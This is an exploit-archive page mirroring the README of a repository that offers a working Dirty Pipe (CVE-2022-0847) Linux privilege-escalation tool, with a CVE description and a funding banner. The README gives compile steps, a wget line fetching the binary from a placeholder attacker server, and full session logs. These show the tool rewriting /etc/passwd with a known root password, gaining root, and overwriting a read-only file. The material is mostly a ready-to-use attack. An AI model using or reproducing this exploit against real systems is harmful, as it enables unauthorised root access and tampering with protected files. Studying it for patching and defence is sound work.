Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-0847 PoC — Linux kernel 安全漏洞

Source
https://github.com/n3rada/DirtyPipe
Associated Vulnerability
Title:Linux kernel 安全漏洞 (CVE-2022-0847)
Description:A flaw was found in the way the "flags" member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system.
Description
Working Dirty Pipe (CVE-2022-0847) exploit tool with root access and file overwrites.
Readme
# Dirty Pipe Exploit: CVE-2022-0847
The Dirty Pipe vulnerability, also known as CVE-2022-0847, is a significant flaw within the Linux kernel. This repository provides an adapted version of the widely used exploit code to make it more user-friendly and modular.

A very good explanation of this vulnerability can be found on the [HackTheBox blog](https://www.hackthebox.com/blog/Dirty-Pipe-Explained-CVE-2022-0847). Max Kellermann's original, more detailed explanation can be found [on his blog](https://dirtypipe.cm4all.com/).

This adapted version is segmented into different methods to increase modularity and ease of modification. Notably, there's an added --root option that modifies the /etc/passwd file, to leverage root access with password `el3ph@nt!`.

Compile the exploit statically:
```shell
gcc -o dpipe dpipe.c -static
```

And retrieve-it from your target before launching-it:
```shell
yoan@teecup:~$ wget http://YOUR_SERVER_ADDRESS/unix/cve/dpipe
--2023-10-15 20:07:44--  http://YOUR_SERVER_ADDRESS/unix/cve/dpipe
Connecting to YOUR_SERVER_ADDRESS:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 769792 (752K) [text/plain]
Saving to: ‘dpipe’

dpipe                                   100%[=============================================================================>] 751.75K  --.-KB/s    in 0.09s

2023-10-15 20:07:44 (8.09 MB/s) - ‘dpipe’ saved [769792/769792]

yoan@teecup:~$ chmod +x dpipe
yoan@teecup:~$ ./dpipe --root
[Dirty Pipe] Attempting to backup '/etc/passwd' to '/tmp/passwd.bak'
[Dirty Pipe] Successfully backed up '/etc/passwd' to '/tmp/passwd.bak'
[Dirty Pipe] Initiating write to '/etc/passwd'...
[Dirty Pipe] Data size to write: 131 bytes
[Dirty Pipe] File '/etc/passwd' opened successfully for reading.
[Dirty Pipe] Pipe size determined: 65536 bytes
[Dirty Pipe] Filling the pipe...
[Dirty Pipe] Pipe filled successfully.
[Dirty Pipe] Draining the pipe...
[Dirty Pipe] Pipe drained successfully.
[Dirty Pipe] Data successfully written to '/etc/passwd'.
[Dirty Pipe] You can connect as root with password 'el3ph@nt!'
[Dirty Pipe] Program execution completed successfully.
yoan@teecup:~$
yoan@teecup:~$ cat /etc/passwd
root:$6$9WETWbCBTQ8pxg4I$odZAx8iIlayCnFdUwDM5dHVfsXXZo1RHRp2a4uQzcPDkRiTJYLA4loZESihn4ASGhWKN9.RWPT.CZJdyfTej4/:0:0:root:/root:/bin/sh
:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
sshd:x:104:65534::/run/sshd:/usr/sbin/nologin
yoan:x:1000:1000::/home/yoan:/bin/bash
yoan@teecup:~$ su root
Password:
# cd /root
# cat flag.txt
Great job! You found me.
```

You can also use the exploit to overwrite content in other files:
```shell
yoan@teecup:~$ echo "Vxxx" > dirty
yoan@teecup:~$ cat dirty
Vxxx
yoan@teecup:~$ ./dpipe dirty 1 uln
[Dirty Pipe] Standard file overwrite mode detected...
[Dirty Pipe] Attempting to backup 'dirty' to '/tmp/dirty.bak'
[Dirty Pipe] Successfully backed up 'dirty' to '/tmp/dirty.bak'
[Dirty Pipe] Initiating write to 'dirty'...
[Dirty Pipe] Data size to write: 3 bytes
[Dirty Pipe] File 'dirty' opened successfully for reading.
[Dirty Pipe] Pipe size determined: 65536 bytes
[Dirty Pipe] Filling the pipe...
[Dirty Pipe] Pipe filled successfully.
[Dirty Pipe] Draining the pipe...
[Dirty Pipe] Pipe drained successfully.
[Dirty Pipe] Data successfully written to 'dirty'.
[Dirty Pipe] Program execution completed successfully.
yoan@teecup:~$ cat dirty
Vuln
```
File Snapshot

 [4.0K]  /data/pocs/e0f7d0e39fcafed10940c22801147644e959673b
├── [865K]  dpipe
├── [7.5K]  dpipe.c
├── [1.0K]  LICENSE
└── [4.2K]  README.md

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →